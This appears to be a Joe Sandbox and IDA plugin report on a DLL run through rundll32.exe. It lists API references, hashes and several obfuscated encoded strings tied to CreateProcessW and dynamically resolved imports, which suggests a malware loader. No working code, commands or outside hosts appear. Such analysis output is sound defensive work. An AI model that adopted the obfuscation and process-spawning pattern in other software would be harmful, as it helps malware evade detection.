                • String ID: %s%s$%s%s$%s%s$VtAuBDZBgBA0BDFB`dAoBEtBRtApBDFB`tAyBDVB`tA`BFNBWBAWBFhBQBA`BKpBNBAjBGhBNRAkBG`BMBAjB@3BZRAhBG`BZtBwBGRBZRB6BDRBORAjBGVBMdByB@3BNdB6BDVBYRAnBGhBNRB1BG`BNRB0BGJBeRA`BFhBadAtBKJBatAiBENBYRAzBKZBYRAzBGNBNdB>$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBRtAzBKhB`BA3BD;B[BAiBKJBfRAtBKRBLBB1B@7BYBAkBKRB$[BAABKBB`BAFBDFBgBAkBEtBVdAuBDFBaRAsBD7BYtA`BF3BbRAiBKJBatAyBD;BYdA3BEtBUdAkBKVBaBA3BEtBVtAoBDNBgRAzBDVBRdAuBD;BgBAUBFVBQdAIB@7BYBAkBB>>$[BAABKBB`BAFBDFBgBAkBEtBWBAuBDNBZRApBEtBWRAsBDNB`dAuBKNBatAnBKRB[BA[BDhBadAhBD;BgtAyBEtBPRALBDVBgBAGBDFBZtAlBDVB[BAIBFVB$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;BZRAiBDtBatAmB@7BgBA7BKRB$gRAyBDVB`dAtBKJBatAnBDhBaBAoBB>>
                • API String ID: 405535372-2132796354
                • Opcode ID: eae8d40b9bdd07769d904abfc346c06edd37a2ae3d9f13e6397d9730f34dbf7f
                • Instruction ID: 2c7680931de376de2619396eaa5f30b24a0e569f8bd1fb9356e38d6d9c49b866
                • Opcode Fuzzy Hash: eae8d40b9bdd07769d904abfc346c06edd37a2ae3d9f13e6397d9730f34dbf7f
                • Instruction Fuzzy Hash: 97A1FAB2C0024CAFDF32DBA8DC85FDD7BB8AF29209F144016E914A72C2EB3592558F55

                Control-flow Graph

                APIs
                • _strlen.LIBCMT ref: 6F9E19BD
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074C4), ref: 6F9E1A5E
                • _strlen.LIBCMT ref: 6F9E1AC4
                • CreateProcessW.KERNELBASE(00000000,?,00000000,00000000,00000000,08000000,00000000,00000000,?,6FA074E0), ref: 6F9E1B60
                Strings
                • %s %s, xrefs: 6F9E1A24
                • `dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>, xrefs: 6F9E199D
                • %s %s, xrefs: 6F9E1B26
                • bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB, xrefs: 6F9E1AA4
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: CreateProcess_strlen
                • String ID: %s %s$%s %s$`dA2BD7BYBApBDtBNtBzB@7BYRA7BDVBJBAGBGlB[BA[BDhBadAhBD;BgtAyBEtBVtA6BKNBgBAoBD3BNtBzBEtB`tAlBDhBaRAmBKZBgtBvBDRBaBApB@tBPRAwBDFBYtAoBEZBbRAoBK`B[tADBKVBaBApBKNBZtAzBDVBYRAvBB>>$bBA3BKRB`BAyBGlBOtBuBKJBZRAwBD3BYRAvBDFBaBAoB@7BZtAuBD3BOtAnBD;B`dBzB@;B`dAoBD`BbRA3B@7BgBAwBKBB
                • API String ID: 3222040079-4228346574
                • Opcode ID: 479711d39fad8989df4a24b01a2702ec981d89351e0691a40abaccb2ede4adc8
                • Instruction ID: eeba3f7f6244f04be8899fe200f099ed5ef7a916c772a5d8fc228899dd34ea34
                • Opcode Fuzzy Hash: 479711d39fad8989df4a24b01a2702ec981d89351e0691a40abaccb2ede4adc8
                • Instruction Fuzzy Hash: 57514DB1D40348ABEB31DFA4EC41FDD77A8BF19708F140029EA14AA1C2EBB5A6548B55

                Control-flow Graph

                APIs
                • __RTC_Initialize.LIBCMT ref: 6F9E4CEA
                • ___scrt_uninitialize_crt.LIBCMT ref: 6F9E4D04
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: Initialize___scrt_uninitialize_crt
                • String ID:
                • API String ID: 2442719207-0
                • Opcode ID: 45cc6e3b3e78bbb5b2225db4e11605e4a27d29d19d74083c3e6b7111f2992fc5
                • Instruction ID: 37059377de260f8dd1f3dc0a93f98c3e9f8e93f29919172ca88f0f71fa4b8a1d
                • Opcode Fuzzy Hash: 45cc6e3b3e78bbb5b2225db4e11605e4a27d29d19d74083c3e6b7111f2992fc5
                • Instruction Fuzzy Hash: 0241B036D00715AFDB239F6DD800B9E76B8FF95768F01411AE814972D1D734E9828FA0

                Control-flow Graph: entry 6f9e4d53 (Executed/Not Executed edge list omitted; named calls: dllmain_raw, dllmain_crt_dispatch, 6f9e5570, 6f9e1000, 6f9e4ca3)
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: dllmain_raw$dllmain_crt_dispatch
                • String ID:
                • API String ID: 3136044242-0
                • Opcode ID: 9e088eccd0d38fd08eb9c154a935de4b8f5c823d78eca76992ee5d991dc0d9fa
                • Instruction ID: 8f10adf93c27ff6c171c97f3b492e4155e6226eb741b233104789bec73f6c139
                • Opcode Fuzzy Hash: 9e088eccd0d38fd08eb9c154a935de4b8f5c823d78eca76992ee5d991dc0d9fa
                • Instruction Fuzzy Hash: A7216075D00625AFDB234F5DCC40AAF3A69FF95A94B01411AF8285B2D0D735ED918FD0

                Control-flow Graph: entry 6f9e1000 (Executed/Not Executed edge list omitted; named calls: 6f9e4402, ExitProcess)
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ExitProcess
                • String ID:
                • API String ID: 621844428-0
                • Opcode ID: 54fc6aacd580b97b9dcf23a0c7118d5f210e866714d3b420a18bffba4e75e17d
                • Instruction ID: 9ee46ea84656e40b968ae4b6b4acd968d6776ecdd68f5a6d189f0f0f73f1473a
                • Opcode Fuzzy Hash: 54fc6aacd580b97b9dcf23a0c7118d5f210e866714d3b420a18bffba4e75e17d
                • Instruction Fuzzy Hash: 38D01274649248EBCB059BB88905B8D77E8EF0B322F508026E514972C1D630DA44AD22
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction ID: 41f2b95840e196ad3d7dbdb32b86040b7d61d2fa60615cb2af592da44f612273
                • Opcode Fuzzy Hash: 10941fa296378a8a5a9f7a9e3a6299de1727250a8a886395a75c3011d5e11ab4
                • Instruction Fuzzy Hash: 93023F71E012199BDB14CFA9C98079EFBF5FF49314F24826AD915E7381D731A942CB90
                APIs
                • IsProcessorFeaturePresent.KERNEL32(00000017,00000000), ref: 6F9E53FA
                • IsDebuggerPresent.KERNEL32 ref: 6F9E54C6
                • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6F9E54DF
                • UnhandledExceptionFilter.KERNEL32(?), ref: 6F9E54E9
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                • String ID:
                • API String ID: 254469556-0
                • Opcode ID: 134e07f16de817758f734f24105152099ed11505c24f4926dfd762e6a870347b
                • Instruction ID: 78743b56ade3984030df1b2e3b95c62b6f536113c5d82bee217be2c7ea41bfe2
                • Opcode Fuzzy Hash: 134e07f16de817758f734f24105152099ed11505c24f4926dfd762e6a870347b
                • Instruction Fuzzy Hash: 7E31F6B5D05318EBDF21DFA4D9497CDBBB8AF08304F1041AAE50CAB290EB719A85CF45

                Control-flow Graph

                Strings
                • QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>, xrefs: 6F9E1887
                • QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>, xrefs: 6F9E17F6
                • QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>, xrefs: 6F9E1765
                • kernel32.dll, xrefs: 6F9E1755
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: AddressProc_strlen$HandleModule
                • String ID: QdAsBD7BYBADBDhB`dAyBKRBQdAsBDtBYRA[BB>>$QdAsBD7BYBALBDVBfBA3BFZBbRApBDVBUtB>$QtAoBKRBQRAvBKZBbRAzBD;BadAwBDVBadA3BEZBZRAzBDhBZRAjBDtBYRA[BB>>$kernel32.dll
                • API String ID: 3538810943-2765630095
                • Opcode ID: 2a379053233ef17eba8332c404caa62232c306b5bdfab4901d23d71f89b9ffb9
                • Instruction ID: 328c724de8a8eff0298c9dd58e01739b72527d30cca24aa7d0ab3dbf1e8fcb4e
                • Opcode Fuzzy Hash: 2a379053233ef17eba8332c404caa62232c306b5bdfab4901d23d71f89b9ffb9
                • Instruction Fuzzy Hash: 1A611771C043489FDB26CFB8DC84B9CBBB9BF1A318F244129E554A7282DB359959CF00

                Control-flow Graph: entry 6f9f8279 (Executed/Not Executed edge list omitted; named calls: GetFileType, GetLastError, CloseHandle, 6f9f8055, 6f9f041e, 6f9f513a, 6f9f0431, 6f9f7fc0, 6f9f03d7, 6f9f5085, 6f9f81cf, 6f9f7d6a, 6f9f2516, 6f9f524d)
                APIs
                  • Part of subcall function 6F9F7FC0: CreateFileW.KERNEL32(00000000,00000000,?,6F9F8322,?,?,00000000,?,6F9F8322,00000000,0000000C), ref: 6F9F7FDD
                • GetLastError.KERNEL32 ref: 6F9F838D
                • __dosmaperr.LIBCMT ref: 6F9F8394
                • GetFileType.KERNEL32(00000000), ref: 6F9F83A0
                • GetLastError.KERNEL32 ref: 6F9F83AA
                • __dosmaperr.LIBCMT ref: 6F9F83B3
                • CloseHandle.KERNEL32(00000000), ref: 6F9F83D3
                • CloseHandle.KERNEL32(00000000), ref: 6F9F8520
                • GetLastError.KERNEL32 ref: 6F9F8552
                • __dosmaperr.LIBCMT ref: 6F9F8559
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                • String ID: H
                • API String ID: 4237864984-2852464175
                • Opcode ID: 4af6af01b6e3b2ba8af986970952df45dd80cdf71fd828bcc3b3dbb060b1376c
                • Instruction ID: 3288d38ea6a097e82a780bf9916855d5d582761d7e26ab805963f75f92ec2c81
                • Opcode Fuzzy Hash: 4af6af01b6e3b2ba8af986970952df45dd80cdf71fd828bcc3b3dbb060b1376c
                • Instruction Fuzzy Hash: AAA12232A1A6149FCF199F68DC50BAE3BB5AF46328F180249E811DF2D1D775E813CB81

                Control-flow Graph: entry 6f9e6ada (Executed/Not Executed edge list omitted; named calls: 6f9e7a50, 6f9eed44, 6f9e6795, 6f9e6e7f, 6f9e57cf, 6f9e62da, 6f9e74f8, 6f9eed08, 6f9e59bb, 6f9e73f8, 6f9e75b5, 6f9e736f, 6f9e6fb5, 6f9e6a5a, 6f9e7169, 6f9e6486, 6f9e7181)
                APIs
                • type_info::operator==.LIBVCRUNTIME ref: 6F9E6BF9
                • ___TypeMatch.LIBVCRUNTIME ref: 6F9E6D07
                • _UnwindNestedFrames.LIBCMT ref: 6F9E6E59
                • CallUnexpected.LIBVCRUNTIME ref: 6F9E6E74
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
                • String ID: csm$csm$csm
                • API String ID: 2751267872-393685449
                • Opcode ID: 496e9e35ae3b0188b7da02238e0e7905dafde6b41095736e85f97ef758c65e31
                • Instruction ID: ec3bc2f5668578b73dc31df19e638787bf038e0333bb8f2658d231313e855140
                • Opcode Fuzzy Hash: 496e9e35ae3b0188b7da02238e0e7905dafde6b41095736e85f97ef758c65e31
                • Instruction Fuzzy Hash: 85B19031820319EFCF07CFA4C84099EBBB9FF16314B55456AEA146B2C2D731EA61CB91

                Control-flow Graph: entry 6f9f068d (Executed/Not Executed edge list omitted; named calls: 6f9ede7c, 6f9f09ba, 6f9fc370, 6f9ec320, 6f9e6180, 6f9f0ecd, 6f9fc2c0, 6f9fc000, 6f9fc1e0)
                Memory Dump Source
                • Source File: 00000003.00000002.2054463329.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
                • Associated: 00000003.00000002.2054444227.000000006F9E0000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054497150.000000006F9FD000.00000002.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054517477.000000006FA06000.00000004.00000001.01000000.00000003.sdmp
                • Associated: 00000003.00000002.2054541280.000000006FA08000.00000002.00000001.01000000.00000003.sdmp
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
                Similarity
                • API ID: _strrchr
                • String ID:
                • API String ID: 3213747228-0
                • Opcode ID: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction ID: baf217140c8dcd65b40ec424e9feedf26838e1ce44582113907c9b87a324178c
                • Opcode Fuzzy Hash: 5b196b74059184e9b8e0842bd6eede7b04aae286f8f0b9da0e097125ac15f892
                • Instruction Fuzzy Hash: 5FB16772A023559FEB158F64CC80BAE7BADEF55310F145196E904AF2D2E370E943CBA0

                Control-flow Graph
                APIs
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6577
                • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E657F
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6608
                • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E6633
                • _ValidateLocalCookies.LIBCMT ref: 6F9E6688
                Similarity
                • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                • String ID: csm
                • API String ID: 1170836740-1018135373
                • Opcode ID: 00833ef39707546aafc042727115e06d77210fbbd0a43cf1edf8837cb79cfeb6
                • Instruction ID: 4fea8862b25d08e8bf505b4eb80486591ebf0db6d2677bab8646e0077f54472d
                • Opcode Fuzzy Hash: 00833ef39707546aafc042727115e06d77210fbbd0a43cf1edf8837cb79cfeb6
                • Instruction Fuzzy Hash: BD41B874E20209DBCF11CF68C844A9E7BB5BF46328F108156DA189B3D6DB36E915CF91

                Control-flow Graph
                APIs
                • FreeLibrary.KERNEL32(00000000,?,6F9F1812,6F9E7D84,B586E81C,00000000,6F9EC75A,00000000,?,6F9F198B,00000022,FlsSetValue,6F9FF4F8,ccs,6F9EC75A), ref: 6F9F17C4
                Similarity
                • API ID: FreeLibrary
                • String ID: api-ms-$ext-ms-
                • API String ID: 3664257935-537541572
                • Opcode ID: 89779a191b62a359c422b201cbe5d7e24261c050e5accc42ee1de3dbfd62f5f0
                • Instruction ID: e40b334bd073041dff6e01b0f17c9760de5542fcaa0258fef270668817dce6d2
                • Opcode Fuzzy Hash: 89779a191b62a359c422b201cbe5d7e24261c050e5accc42ee1de3dbfd62f5f0
                • Instruction Fuzzy Hash: 49210AB1A07611A7EB119B74EC80A8A376DAF43774F250215ED19A72C2D730F953C7D0

                Control-flow Graph
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 5a4999cbd253340700a721d20dd1df6ac67830b14604a817e69a7142f4b4e5a6
                • Instruction ID: 71fc7e5ab318c4dd7e1ec292de8353cefa80c41b500404ca52ab15bb72ccbb9f
                • Opcode Fuzzy Hash: 5a4999cbd253340700a721d20dd1df6ac67830b14604a817e69a7142f4b4e5a6
                • Instruction Fuzzy Hash: D8B1D770E053499FDB12CFA8D840BAE7BB9AF46318F04515AE914972E2D770E943CF50
                APIs
                • GetLastError.KERNEL32(00000001,?,6F9E6721,6F9E51C4,6F9E4B74,?,6F9E4DAC,?,00000001,?,?,00000001,?,6FA04240,0000000C,6F9E4EA5), ref: 6F9E67B1
                • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E67BF
                • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E67D8
                • SetLastError.KERNEL32(00000000,6F9E4DAC,?,00000001,?,?,00000001,?,6FA04240,0000000C,6F9E4EA5,?,00000001,?), ref: 6F9E682A
                Similarity
                • API ID: ErrorLastValue___vcrt_
                • String ID:
                • API String ID: 3852720340-0
                • Opcode ID: dfdf7fe836fb0ec0733f181b63a26d79ef79237d028ecca6ccee01f88ff9caf5
                • Instruction ID: b1f083cb3b3d3312ef3f095ca282bb96336c5217fa9d947b44f3b8a2ab93a7e8
                • Opcode Fuzzy Hash: dfdf7fe836fb0ec0733f181b63a26d79ef79237d028ecca6ccee01f88ff9caf5
                • Instruction Fuzzy Hash: 7B01D43211EB125EAA171AB46C946472B59EF5777C730833EE720453D1EF12D862C18A
                Strings
                • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F9F3E14
                Similarity
                • API ID:
                • String ID: C:\Windows\SysWOW64\rundll32.exe
                • API String ID: 0-2837366778
                • Opcode ID: 1e3172428df33662d62a9d4dc582287f17cb59eca170ea0b85102df59a552e79
                • Instruction ID: 5b7a7f9e1679c946130062c04525eb99cf12bfac563d28d90b35c0b7e1f6adaa
                • Opcode Fuzzy Hash: 1e3172428df33662d62a9d4dc582287f17cb59eca170ea0b85102df59a552e79
                • Instruction Fuzzy Hash: 0021F03160A205AFDB129F74DC41D5B77ADAF113687004614EE169B2D1E738FC52CBA2
                APIs
                • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,B5FBC098,6F9EC75A,?,00000000,6F9FC710,000000FF,?,6F9EE3C3,B586E81C,?,6F9EE397,?), ref: 6F9EE45E
                • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EE470
                • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FC710,000000FF,?,6F9EE3C3,B586E81C,?,6F9EE397,?), ref: 6F9EE492
                Similarity
                • API ID: AddressFreeHandleLibraryModuleProc
                • String ID: CorExitProcess$mscoree.dll
                • API String ID: 4061214504-1276376045
                • Opcode ID: 5b65d13e5c707de824d2b348650507c48963b1824bdf2c75f02eb7080dee24d3
                • Instruction ID: 6c8dc8bb744076d8706710171ffb484282acbc6f1ef7774dc40ee4af8b8f184e
                • Opcode Fuzzy Hash: 5b65d13e5c707de824d2b348650507c48963b1824bdf2c75f02eb7080dee24d3
                • Instruction Fuzzy Hash: 6501A231905A1ABBEB129F40CC08FAE7BB9FF45764F004626F921A23C0DB34D905CB90
                APIs
                • __alloca_probe_16.LIBCMT ref: 6F9F8D79
                • __alloca_probe_16.LIBCMT ref: 6F9F8E42
                • __freea.LIBCMT ref: 6F9F8EA9
                  • Part of subcall function 6F9F047E: RtlAllocateHeap.KERNEL32(00000000,6F9F4371,7D32887D,?,6F9F4371,00000220,?,6F9E1775,7D32887D), ref: 6F9F04B0
                • __freea.LIBCMT ref: 6F9F8EBC
                • __freea.LIBCMT ref: 6F9F8EC9
                Similarity
                • API ID: __freea$__alloca_probe_16$AllocateHeap
                • String ID:
                • API String ID: 1423051803-0
                • Opcode ID: 67e20e05562b1584d2e98a8c66e9abd3ee7a267363bf8e2d0265f66a12635e93
                • Instruction ID: c7cd2159103a40b8d5135be626dd784ed37a7ccee5ac8af7a2f17fad64ecdd1f
                • Opcode Fuzzy Hash: 67e20e05562b1584d2e98a8c66e9abd3ee7a267363bf8e2d0265f66a12635e93
                • Instruction Fuzzy Hash: 96510672A06206AFEB5A5F66CC84EEB36ADEF95314B10052DFD15D61D0E730EC52C7A0
                APIs
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E7863,00000000,?,00000001,?,?,?,6F9E7952,00000001,FlsFree,6F9FDCE0,FlsFree), ref: 6F9E78BF
                • GetLastError.KERNEL32(?,6F9E7863,00000000,?,00000001,?,?,?,6F9E7952,00000001,FlsFree,6F9FDCE0,FlsFree,00000000,?,6F9E6878), ref: 6F9E78C9
                • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E78F1
                Similarity
                • API ID: LibraryLoad$ErrorLast
                • String ID: api-ms-
                • API String ID: 3177248105-2084034818
                • Opcode ID: b47c339dd91411f1bbecaed53c69ccd36df81b0fa396bc8dbd65172b8f2ba03a
                • Instruction ID: e0995ae150704eadd01931741c95366524bb6e7fc4aa82250b39d65878c4bd59
                • Opcode Fuzzy Hash: b47c339dd91411f1bbecaed53c69ccd36df81b0fa396bc8dbd65172b8f2ba03a
                • Instruction Fuzzy Hash: EEE04F3024830AB7FF061E60EC45B493F6ABF11B50F144431FA0DE81D2EBA1E462DA8A
                APIs
                • GetConsoleOutputCP.KERNEL32(B5FBC098,00000000,00000000,?), ref: 6F9F2649
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F289B
                • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F28E1
                • GetLastError.KERNEL32 ref: 6F9F2984
                Similarity
                • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
                • String ID:
                • API String ID: 2112829910-0
                • Opcode ID: fe81266302eadc7dbad4a0eb118a1f72f7f336948244fc018ea67c52c7bcdbaf
                • Instruction ID: 88a3865aec50a2153264f08ea284437b8430fd06ee3aea968d8feab9cd1998f0
                • Opcode Fuzzy Hash: fe81266302eadc7dbad4a0eb118a1f72f7f336948244fc018ea67c52c7bcdbaf
                • Instruction Fuzzy Hash: 58D16B75D052899FCB05CFA8C980AEDBBB9FF09314F28412AE555EB391D630E952CB50
                Similarity
                • API ID: AdjustPointer
                • String ID:
                • API String ID: 1740715915-0
                • Opcode ID: b97839c47a9caff3eadd396ee411979d5a0aa84b8b7e82d5c6d866617396aefd
                • Instruction ID: 969753698cff31dcd0520bd5c325d6c23ab26ae89bc23608c0f8d1ee191ba1e7
                • Opcode Fuzzy Hash: b97839c47a9caff3eadd396ee411979d5a0aa84b8b7e82d5c6d866617396aefd
                • Instruction Fuzzy Hash: 4C51E372A24702DFEB2A8F15D940BAA73B9FF92314F10452EDB514B2D1EB31E880C751
                APIs
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • GetLastError.KERNEL32 ref: 6F9F36F8
                • __dosmaperr.LIBCMT ref: 6F9F36FF
                • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F3739
                • __dosmaperr.LIBCMT ref: 6F9F3740
                Similarity
                • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
                • String ID:
                • API String ID: 1913693674-0
                • Opcode ID: 9454dc167a4ff88182e540ef307a2bbb1adcd086a13c1c14dbb32208a20b8c1a
                • Instruction ID: e22667a4e35f41a5788a80cbd447b4fd44ebc042b03d52db810d2d323323788c
                • Opcode Fuzzy Hash: 9454dc167a4ff88182e540ef307a2bbb1adcd086a13c1c14dbb32208a20b8c1a
                • Instruction Fuzzy Hash: FA21C27160A705AFD7109F75C882D5BB7ADFF013687008519EE29976D0E738FC428B92
                APIs
                • GetEnvironmentStringsW.KERNEL32 ref: 6F9F49F0
                  • Part of subcall function 6F9F4945: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F8E9F,?,00000000,-00000008), ref: 6F9F49A6
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F4A28
                • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F4A48
                Similarity
                • API ID: EnvironmentStrings$Free$ByteCharMultiWide
                • String ID:
                • API String ID: 158306478-0
                • Opcode ID: e9e8a88f779a4c5ede003a32aa79a75e6d8b8cdeab1903a1e24b7626ede81452
                • Instruction ID: a802c6e0a407c010a1fd07c567f1c5e96a8aec38052186ae87f01997ad2cc124
